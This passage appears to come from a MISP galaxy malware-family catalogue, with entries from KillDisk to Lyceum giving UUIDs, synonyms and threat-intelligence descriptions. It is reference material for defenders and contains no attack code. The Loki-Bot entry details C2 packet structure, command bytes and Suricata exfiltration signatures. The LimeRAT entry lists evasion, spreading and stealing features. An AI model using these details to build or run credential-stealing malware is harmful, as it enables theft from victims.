"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KillDisk (Lazarus).

Known Synonyms
`KillDisk.NBO`

Internal MISP references

UUID 6f377d0b-9eaa-474c-8cf8-0718ee2b0efc which can be used as unique global reference for KillDisk (Lazarus) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Laziok

Internal MISP references

UUID 686a9217-3978-47c0-9989-dd2a3438ba72 which can be used as unique global reference for Laziok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LazyCat

Internal MISP references

UUID 454db469-724a-4084-873c-906abf91d0d5 which can be used as unique global reference for LazyCat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LCPDot

Internal MISP references

UUID 23dd327e-5d1d-4b75-993e-5d79d9fc0a70 which can be used as unique global reference for LCPDot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LDR4

A further branch of the URSNIF collection of malware families. According to Mandiant, it no longer has focus on banking fraud but generic backdoor capabilities instead.

Internal MISP references

UUID c429622f-cbdf-47d6-88e8-091283ed5703 which can be used as unique global reference for LDR4 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Leakthemall

Ransomware.

Internal MISP references

UUID 526add8e-ed78-4e8e-8d4c-152570fe566e which can be used as unique global reference for Leakthemall in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Leash

Internal MISP references

UUID 8faf7592-be5c-44af-b1ca-2bd8caec195d which can be used as unique global reference for Leash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lechiket

Internal MISP references

UUID 3df8cf32-cbbf-44f4-8b7b-b1a977138956 which can be used as unique global reference for Lechiket in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lemon Duck

Lemon Duck is a monerocrypto-mining malware with capabilitiy to spread rapidly across the entire network. The malware runs its payload mainly in memory. Internal network spreading is performed by SMB RCE Vulnerability (CVE-2017-0144), or brute-force attacks.

Internal MISP references

UUID ff1896f4-8774-4c15-9353-918e3dc2e840 which can be used as unique global reference for Lemon Duck in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Leouncia

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Leouncia.

Known Synonyms
`shoco`

Internal MISP references

UUID 41da41aa-0729-428a-8b82-636600f8e230 which can be used as unique global reference for Leouncia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lethic

Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.

Internal MISP references

UUID 342f5c56-861c-4a06-b5db-85c3c424f51f which can be used as unique global reference for Lethic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LetMeOut

Internal MISP references

UUID 007697bc-463e-4f90-93e3-8f8fdeff147a which can be used as unique global reference for LetMeOut in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LgoogLoader

LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.

Internal MISP references

UUID edf1bb94-cc6b-46fd-a922-18fd2a0f323f which can be used as unique global reference for LgoogLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Liderc

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Liderc.

Known Synonyms
`LEMPO`

Internal MISP references

UUID ed825d46-be1e-4d36-b828-1b85274773dd which can be used as unique global reference for Liderc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LIGHTBUNNY

Internal MISP references

UUID ea790924-8a81-4141-9e5c-14a205af170f which can be used as unique global reference for LIGHTBUNNY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LightlessCan

LightlessCan is a complex HTTP(S) RAT, that is a successor of the Lazarus RAT named BlindingCan.

In Q2 2022 and Q1 2023, it was deployed in targeted attacks against an aerospace company in Spain and a technology company in India.

Besides the support for commands already present in BlindingCan, its most significant update is mimicked functionality of many native Windows commands: • ipconfig • net • netsh advfirewall firewall • netstat • reg • sc • ping (for both IPv4 and IPv6 protocols) • wmic process call create • nslookup • schstasks • systeminfo • arp

These native commands are often abused by the attackers after they have gotten a foothold in the target’s system. Lightless is able to execute them discreetly within the RAT itself, rather than being executed visibly in the system console. This provides stealthiness, both in evading real-time monitoring solutions like EDRs, and postmortem digital forensic tools.

LightlessCan use RC6 for decryption of its configuration, and also for encryption and decryption of network traffic.

Internal MISP references

UUID 4a00dbe4-91b7-4cfc-a6a2-528ccc9a4303 which can be used as unique global reference for LightlessCan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LightNeuron

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LightNeuron.

Known Synonyms
`NETTRANS`
`XTRANS`

Internal MISP references

UUID 96b0b8fa-79b6-4519-a794-f6f325f96fd7 which can be used as unique global reference for LightNeuron in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lightning Stealer

Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user’s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration.

Internal MISP references

UUID 48a21f7a-3dc9-4524-9628-10ed0f762bb4 which can be used as unique global reference for Lightning Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LIGHTRAIL

According to Mandiant, this is a tunneler, likely based on an open-source Socks4a proxy, that communicates using Azure cloud infrastructure.

Internal MISP references

UUID 32656e7e-6008-491b-b310-fb203a67b0c7 which can be used as unique global reference for LIGHTRAIL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LIGHTWORK

According to Mandiant, LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP. It crafts configurable IEC-104 ASDU messages, to change the state of RTU IOAs to ON or OFF. This sample works in tandem with PIEHOP, which sets up the execution.

Internal MISP references

UUID 01cbe4cc-43ba-4bc8-9fee-9daf63dda335 which can be used as unique global reference for LIGHTWORK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ligsterac

Internal MISP references

UUID 7d328c7b-7dc8-4891-bbd1-a05dedc8bac4 which can be used as unique global reference for Ligsterac in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lilith

Lilith is a console-based ultra light-weight RAT developed in C++. It features a straight-forward set of commands that allows for near complete control of a machine.

Internal MISP references

UUID c443dc36-f439-46d8-8ce7-07d3532a412b which can be used as unique global reference for Lilith in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

limedownloader

Internal MISP references

UUID a70436b1-559d-48af-836f-f46074cd8ef3 which can be used as unique global reference for limedownloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

limeminer

Internal MISP references

UUID 3819bc21-8c15-48ee-8e68-ee2a0c5f82a7 which can be used as unique global reference for limeminer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LimePad

Internal MISP references

UUID 0cae4bcd-9656-434d-81c1-c55801b3eaa3 which can be used as unique global reference for LimePad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LimeRAT

## Description Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves.

Main Features

.NET
- Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0
Connection
- Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports
Plugin
- Using plugin system to decrease stub's size and lower the AV detection
Encryption
- The communication between server & client is encrypted with AES
Spreading
- Infecting all files and folders on USB drivers
Bypass
- Low AV detection and undetected startup method
Lightweight
- Payload size is about 25 KB
Anti Virtual Machines
- Uninstall itself if the machine is virtual to avoid scanning or analyzing
Ransomware
- Encrypting files on all HHD and USB with .Lime extension
XMR Miner
- High performance Monero CPU miner with user idle\active optimizations
DDoS
- Creating a powerful DDOS attack to make an online service unavailable
Crypto Stealer
- Stealing Cryptocurrency sensitive data
Screen-Locker
- Prevents user from accessing their Windows GUI
And more
- On Connect Auto Task
- Force enable Windows RDP
- Persistence
- File manager
- Passowrds stealer
- Remote desktop
- Bitcoin grabber
- Downloader
- Keylogger

Internal MISP references

UUID 771dbe6a-3f01-4bd4-8edd-070b2eb9df66 which can be used as unique global reference for LimeRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Limitail

Internal MISP references

UUID dcd1f76d-5a40-4c58-b01e-a749871fe50b which can be used as unique global reference for Limitail in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail - webarchive

Associated metadata

Metadata key	Value
type	[]

LinseningSvr

Internal MISP references

UUID 9a66df8d-ce65-49d6-a648-c1a5ea58cbc2 which can be used as unique global reference for LinseningSvr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LIONTAIL

Internal MISP references

UUID bad7ba1a-f945-436a-82ce-f125c82e2164 which can be used as unique global reference for LIONTAIL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Listrix

Internal MISP references

UUID 54c8a055-a4be-4ec0-9943-ecad929e0dac which can be used as unique global reference for Listrix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LiteDuke

According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. ESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.

Internal MISP references

UUID ae7352bd-86e9-455d-bdc3-0567886a8392 which can be used as unique global reference for LiteDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LiteHTTP

According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system.

The source is on GitHub: https://github.com/zettabithf/LiteHTTP

Internal MISP references

UUID 2f9e1221-0a59-447b-a9e8-bedb010cd3d8 which can be used as unique global reference for LiteHTTP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LOBSHOT

According to PCrisk, LOBSHOT is a type of malware with a feature called hVNC (Hidden Virtual Network Computing) that allows attackers to access a victim's computer without being noticed. The hVNC component is effective in evading fraud detection systems. Also, LOBSHOT is being used to carry out financial crimes through the use of banking trojan and information-stealing functionalities.

Internal MISP references

UUID c30db30e-e29a-4f62-bda0-c284fa7c6f6d which can be used as unique global reference for LOBSHOT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LockBit (Windows)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LockBit (Windows).

Known Synonyms
`ABCD Ransomware`

Internal MISP references

UUID fd035735-1ab9-419d-a94c-d560612e970b which can be used as unique global reference for LockBit (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LockerGoga

According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such as the Windows Boot Manager.

Internal MISP references

UUID a4a6469d-6753-4195-9635-f11d458525f9 which can be used as unique global reference for LockerGoga in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LockFile

A ransomware first observed in July 2021.

Internal MISP references

UUID 97879260-ee50-4c7e-8d87-4bb134d1fdaf which can be used as unique global reference for LockFile in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Locky

Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.

Internal MISP references

UUID 24c9bb9f-1f9a-4e01-95d8-86c51733e11c which can be used as unique global reference for Locky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Locky (Decryptor)

Internal MISP references

UUID cd55cfa8-1e20-417b-9997-754b600f9f49 which can be used as unique global reference for Locky (Decryptor) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor - webarchive

Associated metadata

Metadata key	Value
type	[]

Locky Loader

For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.

Internal MISP references

UUID 62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2 which can be used as unique global reference for Locky Loader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader - webarchive

Associated metadata

Metadata key	Value
type	[]

LockPOS

Internal MISP references

UUID d2c111bf-ba0d-498a-8ca8-4cc508855872 which can be used as unique global reference for LockPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Loda

Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Loda.

Known Synonyms
`LodaRAT`
`Nymeria`

Internal MISP references

UUID 8098d303-cb5f-4eff-b62e-96bb5ef4329f which can be used as unique global reference for Loda in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LODEINFO

Internal MISP references

UUID 9429e1b3-31fb-4e52-ad78-e3d377f10fcb which can be used as unique global reference for LODEINFO in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Logedrut

Internal MISP references

UUID 70cd1eb4-0410-47c6-8817-418380240d85 which can be used as unique global reference for Logedrut in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LogPOS

Internal MISP references

UUID 2789b246-d762-4d38-8cc8-302293e314da which can be used as unique global reference for LogPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Logtu

Internal MISP references

UUID eda979a7-89eb-4dcb-858d-8232e2c47d1e which can be used as unique global reference for Logtu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LoJax

Internal MISP references

UUID 15228ae0-26f9-44d8-8d6e-87b0bd2d2aba which can be used as unique global reference for LoJax in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LokiLocker

LokiLocker is a .Net ransomware, which was seen first in August 2021. This malware is protected with NETGuard (modified ConfuserEX) using the additional KoiVM virtualization plugin. The victims were observed ti be scattered around the world, with main concentation in Estern Europe and Asia (BlackBerry).

Internal MISP references

UUID 3642aa5a-61b3-4de9-b124-8ecb8b53351d which can be used as unique global reference for LokiLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Loki Password Stealer (PWS)

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\ C98066\”.

There can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:

FILE EXTENSION FILE DESCRIPTION .exe A copy of the malware that will execute every time the user account is logged into .lck A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts .hdb A database of hashes for data that has already been exfiltrated to the C2 server .kdb A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.

The second packet transmitted by Loki-Bot contains decrypted Windows credentials.

The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.

The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE PAYLOAD TYPE 0x26 Stolen Cryptocurrency Wallet 0x27 Stolen Application Data 0x28 Get C2 Commands from C2 Server 0x29 Stolen File 0x2A POS (Point of Sale?) 0x2B Keylogger Data 0x2C Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE INSTRUCTION DESCRIPTION 0x00 Download EXE & Execute 0x01 Download DLL & Load #1 0x02 Download DLL & Load #2 0x08 Delete HDB File 0x09 Start Keylogger 0x0A Mine & Steal Data 0x0E Exit Loki-Bot 0x0F Upgrade Loki-Bot 0x10 Change C2 Polling Frequency 0x11 Delete Executables & Exit

Suricata Signatures RULE SID RULE NAME 2024311 ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 2024314 ET TROJAN Loki Bot File Exfiltration Detected 2024315 ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1 2024316 ET TROJAN Loki Bot Screenshot Exfiltration Detected 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 2024319 ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Loki Password Stealer (PWS).

Known Synonyms
`Burkina`
`Loki`
`LokiBot`
`LokiPWS`

Internal MISP references

UUID b8fa5036-813f-4887-b4d4-bb17b4a7eba0 which can be used as unique global reference for Loki Password Stealer (PWS) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lokorrito

According to ESET, this is a banking trojan that was active mainly in Mexico until the beginning of 2020, with builds for Brazil, Chile, and Colombia also having been identified.

Internal MISP references

UUID 5e8f3d59-15bc-492c-afdb-4b71e0417142 which can be used as unique global reference for Lokorrito in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LOLSnif

Internal MISP references

UUID 397bfb34-5643-4d21-a5b1-6950750fb89f which can be used as unique global reference for LOLSnif in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LONGWATCH

The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

Internal MISP references

UUID 08106bd2-975b-421c-8794-366452fb0109 which can be used as unique global reference for LONGWATCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

looChiper

LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families.

Internal MISP references

UUID 4b83ba50-7d50-48b4-bb70-fcbcacd23340 which can be used as unique global reference for looChiper in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper - webarchive

Associated metadata

Metadata key	Value
type	[]

Lookback

Internal MISP references

UUID bb038b04-622b-4df6-b867-601284e8da0e which can be used as unique global reference for Lookback in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

L0rdix

L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:

Download and execute Update Open page (visible) Open page (invisible) Cmd Kill process Upload file HTTP Flood

L0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target's clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular L0rdix.

Known Synonyms
`lordix`

Internal MISP references

UUID fa61a690-fd9c-4036-97fb-bf3674aa60b2 which can be used as unique global reference for L0rdix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lorenz

Tesorion describes Lorenz as a ransomware with design and implementation flaws, leading to impossible decryption with tools provided by the attackers. A free decryptor for 2021 versions was made available via the NoMoreRansom initiative. A new version of the malware was discovered in March 2022, for which again was provided a free decryptor, while the ransomware operators are not able to provide tools to decrypt affected files.

Internal MISP references

UUID 3ec79052-d8c0-49b2-9204-42f9d8f035f8 which can be used as unique global reference for Lorenz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Loup

Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).

Internal MISP references

UUID 8ab39736-68f4-4b51-9b48-7034da1cac71 which can be used as unique global reference for Loup in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LoupeLoader

Internal MISP references

UUID 163370d5-7fea-49ad-b511-9e6701e4eec8 which can be used as unique global reference for LoupeLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LOWBALL

LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.

Internal MISP references

UUID 484b9fd9-76c6-41af-a85b-189b0fc94909 which can be used as unique global reference for LOWBALL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LOWKEY

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LOWKEY.

Known Synonyms
`PortReuse`

Internal MISP references

UUID 515d1318-c3b1-4d40-a321-31b3baf75414 which can be used as unique global reference for LOWKEY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LOWZERO

Internal MISP references

UUID 1efd4902-ff9e-4e71-8867-6eddb9bc456c which can be used as unique global reference for LOWZERO in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LPEClient

LPEClient is an HTTP(S) downloader that expects two command line parameters: an encrypted string containing two URLs (a primary and a secondary C&C server), and the path on the victim's file system to store the downloaded payload.

It sends detailed information about the victim's environment, like computer name, type and number of processors, computer manufacturer, product name, major and minor Windows versions, architecture, memory information, installed security software and the version of the ntoskrnl.exe from its version-information resource.

LPEClient uses specific 32-bit values to represent its execution state (0x59863F09 when connecting via the WinHTTP interface, 0xA9348B57 via WinINet), or the nature of HTTP requests to the C&C servers (0xF07D6B34 when sending system information, 0xEF8C0D51 when requesting a DLL payload, 0xCB790A25 when reporting the successful loading of the DLL, 0xD7B20A96 when reporting the state of the the DLL execution). As the final step, malware looks for the export CloseEnv and executes it.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LPEClient.

Known Synonyms
`LPEClientTea`

Internal MISP references

UUID 754c8f79-743b-49fc-971e-bcd60edef9d8 which can be used as unique global reference for LPEClient in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

lsassDumper

This in Go written malware is lsass process memory dumper, which was custom developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service "transfer.sh".

Internal MISP references

UUID f6e9f1f3-91ba-40af-aa2d-d0d5e824b791 which can be used as unique global reference for lsassDumper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lu0Bot

According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detección de Lu0bot, ya que no causa síntomas significativos, como una grave disminución del rendimiento del sistema.

El programa malicioso funciona como un recolector de telemetría.

Internal MISP references

UUID d81c068d-7420-40ee-ab50-5f29b2ccc314 which can be used as unique global reference for Lu0Bot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LuaDream

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LuaDream.

Known Synonyms
`DreamLand`

Internal MISP references

UUID a6fee19a-21e4-4e2c-9c1f-a38d0732f661 which can be used as unique global reference for LuaDream in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Luca Stealer

According to PCRisk, The Luca stealer can extract a variety of information from compromised machines. It targets data related to the following: operating system, device name, CPUs, desktop environment, network interface, user account name, preferred system language, running processes, etc.

This malicious program can steal information from over thirty Chromium-based browsers. From these applications, Luca can obtain Internet cookies, account log-in credentials (usernames/passwords), and credit card numbers. Additionally, the stealer can extract data from password manager and cryptowallet browser extensions compatible with over twenty browsers.

This malware also targets various messaging applications like Telegram, Discord, ICQ, Skype, Element, etc. It likewise aims to acquire information from gaming-related software such as Steam and Uplay (Ubisoft Connect). Furthermore, some versions of Luca can take screenshots and download the files stored on victims' devices.

Internal MISP references

UUID e9693255-762b-447a-9dfa-2ea1a35fe39c which can be used as unique global reference for Luca Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lucifer

Internal MISP references

UUID 54093130-035f-4f2c-b98c-a660156fbbda which can be used as unique global reference for Lucifer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lumar

This family was previously tracked as PovertyStealer until it's actual name was identified via crime forums.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lumar.

Known Synonyms
`PovertyStealer`

Internal MISP references

UUID f783ca5b-2c4e-479d-9af7-d0abd1eeeaff which can be used as unique global reference for Lumar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Luminosity RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Luminosity RAT.

Known Synonyms
`LuminosityLink`

Internal MISP references

UUID e145863e-f3bd-489c-91f6-0c2b7e9cc59a which can be used as unique global reference for Luminosity RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lumma Stealer

Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lumma Stealer.

Known Synonyms
`LummaC2 Stealer`

Internal MISP references

UUID a14270e4-2b5e-4a90-9ccd-0b68690dbc3e which can be used as unique global reference for Lumma Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LunarMail

According to ESET Research, this is a Outlook Add-In that can use email messages for its C&C communication.

Internal MISP references

UUID 2b489032-f4c5-4fe2-a4ac-d8223fff48b8 which can be used as unique global reference for LunarMail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LunchMoney

An uploader that can exfiltrate files to Dropbox.

Internal MISP references

UUID fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b which can be used as unique global reference for LunchMoney in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lurk

Internal MISP references

UUID 929112e4-e252-4273-b3c2-fd414cfb2776 which can be used as unique global reference for Lurk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Luzo

Internal MISP references

UUID 8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2 which can be used as unique global reference for Luzo in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo - webarchive

Associated metadata

Metadata key	Value
type	[]

Lyceum .NET DNS Backdoor

This .NET written malware is used as backdoor using the dns protocol by a state sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing diles/directories/installed applications, and uploading/downloading/execution of files). There are also variants using HTTP (.Net) and also one written in Golang.

Internal MISP references

UUID e7117036-5142-4a07-ae85-c3ddba7f1d75 which can be used as unique global reference for Lyceum .NET DNS Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
